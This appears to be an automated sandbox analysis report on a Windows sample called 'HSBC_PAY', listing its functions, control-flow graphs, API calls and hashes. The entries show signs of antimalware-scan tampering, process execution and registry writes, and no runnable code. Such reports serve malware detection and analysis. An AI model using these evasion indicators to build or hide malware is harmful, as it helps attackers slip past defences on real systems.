                                                                    Function 02A81724 Relevance: 13.8, APIs: 7, Strings: 2, Instructions: 289sleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 8535 2a81724-2a81736 8536 2a81968-2a8196d 8535->8536 8537 2a8173c-2a8174c 8535->8537 8538 2a81a80-2a81a83 8536->8538 8539 2a81973-2a81984 8536->8539 8540 2a8174e-2a8175b 8537->8540 8541 2a817a4-2a817ad 8537->8541 8545 2a81a89-2a81a8b 8538->8545 8546 2a81684-2a816ad VirtualAlloc 8538->8546 8542 2a81938-2a81945 8539->8542 8543 2a81986-2a819a2 8539->8543 8547 2a8175d-2a8176a 8540->8547 8548 2a81774-2a81780 8540->8548 8541->8540 8544 2a817af-2a817bb 8541->8544 8542->8543 8552 2a81947-2a8195b Sleep 8542->8552 8549 2a819b0-2a819bf 8543->8549 8550 2a819a4-2a819ac 8543->8550 8544->8540 8551 2a817bd-2a817c9 8544->8551 8553 2a816df-2a816e5 8546->8553 8554 2a816af-2a816dc call 2a81644 8546->8554 8555 2a8176c-2a81770 8547->8555 8556 2a81794-2a817a1 8547->8556 8557 2a817f0-2a817f9 8548->8557 8558 2a81782-2a81790 8548->8558 8560 2a819d8-2a819e0 8549->8560 8561 2a819c1-2a819d5 8549->8561 8559 2a81a0c-2a81a22 8550->8559 8551->8540 8562 2a817cb-2a817de Sleep 8551->8562 8552->8543 8565 2a8195d-2a81964 Sleep 8552->8565 8554->8553 8563 2a817fb-2a81808 8557->8563 8564 2a8182c-2a81836 8557->8564 8571 2a81a3b-2a81a47 8559->8571 8572 2a81a24-2a81a32 8559->8572 8568 2a819fc-2a819fe call 2a815cc 8560->8568 8569 2a819e2-2a819fa 8560->8569 8561->8559 8562->8540 8567 2a817e4-2a817eb Sleep 8562->8567 8563->8564 8570 2a8180a-2a8181e Sleep 8563->8570 8573 2a818a8-2a818b4 8564->8573 8574 2a81838-2a81863 8564->8574 8565->8542 8567->8541 8578 2a81a03-2a81a0b 8568->8578 8569->8578 8570->8564 8580 2a81820-2a81827 Sleep 8570->8580 8584 2a81a68 8571->8584 8585 2a81a49-2a81a5c 8571->8585 8572->8571 8581 2a81a34 8572->8581 8576 2a818dc-2a818eb call 2a815cc 8573->8576 8577 2a818b6-2a818c8 8573->8577 8582 2a8187c-2a8188a 8574->8582 8583 2a81865-2a81873 8574->8583 8596 2a818fd-2a81936 8576->8596 8600 2a818ed-2a818f7 8576->8600 8587 2a818ca 8577->8587 8588 2a818cc-2a818da 8577->8588 8580->8563 8581->8571 8591 2a818f8 8582->8591 8592 2a8188c-2a818a6 call 2a81500 8582->8592 8583->8582 8590 2a81875 8583->8590 8586 2a81a6d-2a81a7f 8584->8586 8585->8586 8593 2a81a5e-2a81a63 call 2a81500 8585->8593 8587->8588 8588->8596 8590->8582 8591->8596 8592->8596 8593->8586
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,?,02A81FC1), ref: 02A817D0
                                                                    • Sleep.KERNEL32(0000000A,00000000,?,02A81FC1), ref: 02A817E6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: 0 $0`
                                                                    • API String ID: 3472027048-1112504500
                                                                    • Opcode ID: d249f3c9310b2fd163b29630ce70a79b6a4fc446426061558940b49576c1a32e
                                                                    • Instruction ID: 11b61a42860d8e648610486e502a74a4d88eed45d3c164ebc420f2fca3edae23
                                                                    • Opcode Fuzzy Hash: d249f3c9310b2fd163b29630ce70a79b6a4fc446426061558940b49576c1a32e
                                                                    • Instruction Fuzzy Hash: CAB1DD72A412518BDB15DF28DAC0365BBE1FB85324F1886AAD54ACF285EF70E453CB90
                                                                    Function 02A81A8C Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 175sleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 10477 2a81a8c-2a81a9b 10478 2a81b6c-2a81b6f 10477->10478 10479 2a81aa1-2a81aa5 10477->10479 10480 2a81c5c-2a81c60 10478->10480 10481 2a81b75-2a81b7f 10478->10481 10482 2a81b08-2a81b11 10479->10482 10483 2a81aa7-2a81aae 10479->10483 10488 2a816e8-2a8170b call 2a81644 VirtualFree 10480->10488 10489 2a81c66-2a81c6b 10480->10489 10484 2a81b3c-2a81b49 10481->10484 10485 2a81b81-2a81b8d 10481->10485 10482->10483 10490 2a81b13-2a81b27 Sleep 10482->10490 10486 2a81adc-2a81ade 10483->10486 10487 2a81ab0-2a81abb 10483->10487 10484->10485 10499 2a81b4b-2a81b5f Sleep 10484->10499 10491 2a81b8f-2a81b92 10485->10491 10492 2a81bc4-2a81bd2 10485->10492 10496 2a81ae0-2a81af1 10486->10496 10497 2a81af3 10486->10497 10494 2a81abd-2a81ac2 10487->10494 10495 2a81ac4-2a81ad9 10487->10495 10507 2a8170d-2a81714 10488->10507 10508 2a81716 10488->10508 10490->10483 10498 2a81b2d-2a81b38 Sleep 10490->10498 10500 2a81b96-2a81b9a 10491->10500 10492->10500 10503 2a81bd4-2a81bd9 call 2a814c0 10492->10503 10496->10497 10502 2a81af6-2a81b03 10496->10502 10497->10502 10498->10482 10499->10485 10504 2a81b61-2a81b68 Sleep 10499->10504 10505 2a81bdc-2a81be9 10500->10505 10506 2a81b9c-2a81ba2 10500->10506 10502->10481 10503->10500 10504->10484 10505->10506 10514 2a81beb-2a81bf2 call 2a814c0 10505->10514 10510 2a81bf4-2a81bfe 10506->10510 10511 2a81ba4-2a81bc2 call 2a81500 10506->10511 10512 2a81719-2a81723 10507->10512 10508->10512 10515 2a81c2c-2a81c59 call 2a81560 10510->10515 10516 2a81c00-2a81c28 VirtualFree 10510->10516 10514->10506
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,02A81FE4), ref: 02A81B17
                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02A81FE4), ref: 02A81B31
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: 0`
                                                                    • API String ID: 3472027048-3339448193
                                                                    • Opcode ID: 61c00b23833a4bf1faa5885c0c9850bbad6ea35c5ded7e6df48246288ead0255
                                                                    • Instruction ID: 8c2fbc6c83211a7b31b7a1a57a5d033771d9a4c2b01c43e15b2bdc459e8531c4
                                                                    • Opcode Fuzzy Hash: 61c00b23833a4bf1faa5885c0c9850bbad6ea35c5ded7e6df48246288ead0255
                                                                    • Instruction Fuzzy Hash: 9251B071A412408FE715EF68DAC8756BBE0AB45314F1885AED549CB282EF70D847CB91
                                                                    Function 02A98704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(amsi), ref: 02A9870D
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                      • Part of subcall function 02A97CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A97D6C
                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02A9876C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                    • String ID: DllGetClassObject$W$amsi
                                                                    • API String ID: 941070894-2671292670
                                                                    • Opcode ID: d4c300fdb9f8c00d6ed4c1d1880efcecc6492a93f5479b8688aac4c40704a5e2
                                                                    • Instruction ID: 4fa4577b9fac62ccf5684e71748776bf7039c32f1dd4ca2ab93ab04df8d2decc
                                                                    • Opcode Fuzzy Hash: d4c300fdb9f8c00d6ed4c1d1880efcecc6492a93f5479b8688aac4c40704a5e2
                                                                    • Instruction Fuzzy Hash: BBF068A058C381B9E601E6758D45F4BBFCD4B52624F048A5CB1E85A2D2DE79D10487B7
                                                                    Function 02A9E2EE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02A9E42E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: CheckConnectionInternet
                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                    • API String ID: 3847983778-3852638603
                                                                    • Opcode ID: 739a1a6631191be58239bf892cd6ee7c7b67c8c84fed8b395f3b8942b298cd5a
                                                                    • Instruction ID: 6d5091522a0934d2cb2be322b588c4ad8163a26bcdf27ee4c1fc96ea42b12ade
                                                                    • Opcode Fuzzy Hash: 739a1a6631191be58239bf892cd6ee7c7b67c8c84fed8b395f3b8942b298cd5a
                                                                    • Instruction Fuzzy Hash: 9D41FC31B90209AFEF10FBA4DA80A9EB7FABF8D710F118426E041A7241DE75AD018F50
                                                                    Function 02A9881C Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(00000000,00000000,02A98903), ref: 02A98850
                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02A98903), ref: 02A98860
                                                                    • GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02A98879
                                                                      • Part of subcall function 02A97CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A97D6C
                                                                    • FreeLibrary.KERNEL32(74AE0000,00000000,02AE1388,Function_000065D8,00000004,02AE1398,02AE1388,000186A3,00000040,02AE139C,74AE0000,00000000,00000000,00000000,00000000,02A98903), ref: 02A988E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                                                                    • String ID:
                                                                    • API String ID: 1543721669-0
                                                                    • Opcode ID: 76125371012240a292418b6c2f2b20c338d061306151cb01dc3ba5e2b72fb07a
                                                                    • Instruction ID: d2d3209d9fb062056cebd912cce300bb07c2e86a7e3fc8dd59665b769e9dd6ef
                                                                    • Opcode Fuzzy Hash: 76125371012240a292418b6c2f2b20c338d061306151cb01dc3ba5e2b72fb07a
                                                                    • Instruction Fuzzy Hash: EF115174A80315BFFF54FBA8CE01A5E77E9EB49700F5004A47509E7A80DE749D028B54
                                                                    Function 02A98406 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • WinExec.KERNEL32(?,?), ref: 02A98470
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$Exec
                                                                    • String ID: Kernel32$WinExec
                                                                    • API String ID: 2292790416-3609268280
                                                                    • Opcode ID: b3ae0fa4a20340975f04ef4762514060861c476eb75732e1b1344ac79dc83b78
                                                                    • Instruction ID: edfeed0a54cb986d0ade6a0b677881182c79a21a7dddfc81bf0db185c07ffa1e
                                                                    • Opcode Fuzzy Hash: b3ae0fa4a20340975f04ef4762514060861c476eb75732e1b1344ac79dc83b78
                                                                    • Instruction Fuzzy Hash: 77016D34680204BFEF10EAA5DD01B5A77E9EB4A710F918460B504DAA40DE38AD118B21
                                                                    Function 02A98408 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A98088,?,?,00000000,?,02A979FE,ntdll,00000000,00000000,02A97A43,?,?,00000000), ref: 02A98056
                                                                      • Part of subcall function 02A98018: GetModuleHandleA.KERNELBASE(?), ref: 02A9806A
                                                                      • Part of subcall function 02A980C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A98148,?,?,00000000,00000000,?,02A98061,00000000,KernelBASE,00000000,00000000,02A98088), ref: 02A9810D
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A98113
                                                                      • Part of subcall function 02A980C0: GetProcAddress.KERNEL32(?,?), ref: 02A98125
                                                                    • WinExec.KERNEL32(?,?), ref: 02A98470
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressProc$Exec
                                                                    • String ID: Kernel32$WinExec
                                                                    • API String ID: 2292790416-3609268280
                                                                    • Opcode ID: 35eaf52dbb2a82d436f2050fa52526575f35bf9ee9b72535b35131b1f9a2a3ae
                                                                    • Instruction ID: c1294ad778112a3b40275f0d28538d128ae2884b5d1d2f15e40ce135982e71d2
                                                                    • Opcode Fuzzy Hash: 35eaf52dbb2a82d436f2050fa52526575f35bf9ee9b72535b35131b1f9a2a3ae
                                                                    • Instruction Fuzzy Hash: 2AF08134680204BFEF10EFA5DD01B5A77EDFB4A710F918460B504DBA40DE38AD118B21
                                                                    Function 02A95BAC Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02A95CF4,?,?,02A93880,00000001), ref: 02A95C08
                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02A95CF4,?,?,02A93880,00000001), ref: 02A95C36
                                                                      • Part of subcall function 02A87D10: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02A93880,02A95C76,00000000,02A95CF4,?,?,02A93880), ref: 02A87D5E
                                                                      • Part of subcall function 02A87F18: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02A93880,02A95C91,00000000,02A95CF4,?,?,02A93880,00000001), ref: 02A87F37
                                                                    • GetLastError.KERNEL32(00000000,02A95CF4,?,?,02A93880,00000001), ref: 02A95C9B
                                                                      • Part of subcall function 02A8A6F8: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02A8C359,00000000,02A8C3B3), ref: 02A8A717
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                    • String ID:
                                                                    • API String ID: 503785936-0
                                                                    • Opcode ID: 837aaf2d184e7f8a60f54bdc82683df78016bb28227e108b7b0181768837fec4
                                                                    • Instruction ID: e45bb7b5cdd365bb2bab279e0d807208d503ad5706da451e8e206eab8a0cbde8
                                                                    • Opcode Fuzzy Hash: 837aaf2d184e7f8a60f54bdc82683df78016bb28227e108b7b0181768837fec4
                                                                    • Instruction Fuzzy Hash: 42317F30E402059FDF01EBA9CA81B9EBBF6AB49714F908465E504AB380EF759905CFA5
                                                                    Function 02A9E6B6 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02BD5914), ref: 02A9E6FC
                                                                    • RegSetValueExA.ADVAPI32(000008DC,00000000,00000000,00000001,00000000,0000001C,00000000,02A9E767), ref: 02A9E734
                                                                    • RegCloseKey.ADVAPI32(000008DC,000008DC,00000000,00000000,00000001,00000000,0000001C,00000000,02A9E767), ref: 02A9E73F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenValue
                                                                    • String ID:
                                                                    • API String ID: 779948276-0
                                                                    • Opcode ID: 371c282ba7612c316f6dc585920227aeddb2b13596ed56faa7446593795759b7
                                                                    • Instruction ID: 1def5e410ab63bf9361f61ec953e6efa19656db4d2cdb32ac06db096d3aaa049
                                                                    • Opcode Fuzzy Hash: 371c282ba7612c316f6dc585920227aeddb2b13596ed56faa7446593795759b7
                                                                    • Instruction Fuzzy Hash: E1110D71A90605AFEB10FBA8DA91DAE7BEDEB09750F900461F604D7250EE34DE408B61
                                                                    Function 02A9E6B8 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,02BD5914), ref: 02A9E6FC
                                                                    • RegSetValueExA.ADVAPI32(000008DC,00000000,00000000,00000001,00000000,0000001C,00000000,02A9E767), ref: 02A9E734
                                                                    • RegCloseKey.ADVAPI32(000008DC,000008DC,00000000,00000000,00000001,00000000,0000001C,00000000,02A9E767), ref: 02A9E73F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenValue
                                                                    • String ID:
                                                                    • API String ID: 779948276-0
                                                                    • Opcode ID: 83bc0dfc5e0375a7c43764ccda4910f1d59b0bec2f597fbdd48c8f6d5cf2249e
                                                                    • Instruction ID: 6c9fb9a9ff401184ee73c9fb7cbb8230b5185d34f8a728f356634457851a2fa9
                                                                    • Opcode Fuzzy Hash: 83bc0dfc5e0375a7c43764ccda4910f1d59b0bec2f597fbdd48c8f6d5cf2249e
                                                                    • Instruction Fuzzy Hash: 89111F71A90605AFEB10FFA8DA91DAE7BEDFB09750F900461F604D7250EF34DA408B61
                                                                    Function 02A8E2E4 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    • Opcode ID: a404adc60cd9ed6f7b1cd8c59751463ea01553cce012c9bed8b2c709122eca05
                                                                    • Instruction ID: f6946718a51e9db7b8e059647b9a395192d7a00c9beaaa21576175b6b666dd94
                                                                    • Opcode Fuzzy Hash: a404adc60cd9ed6f7b1cd8c59751463ea01553cce012c9bed8b2c709122eca05
                                                                    • Instruction Fuzzy Hash: 71F0C230748210EBDF247B398FC8A6927AADF0071174454A6B4069B205EF34CC0ACFA2
                                                                    Function 02A84CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SysFreeString.OLEAUT32(02A9E948), ref: 02A84C1A
                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 02A84D07
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02A84D19
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: String$Free$Alloc
                                                                    • String ID:
                                                                    • API String ID: 986138563-0
                                                                    • Opcode ID: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                                    • Instruction ID: 0e18b239b23b09f36631c15fd226cf8db7d14666720df8d12bd13969fdd02f59
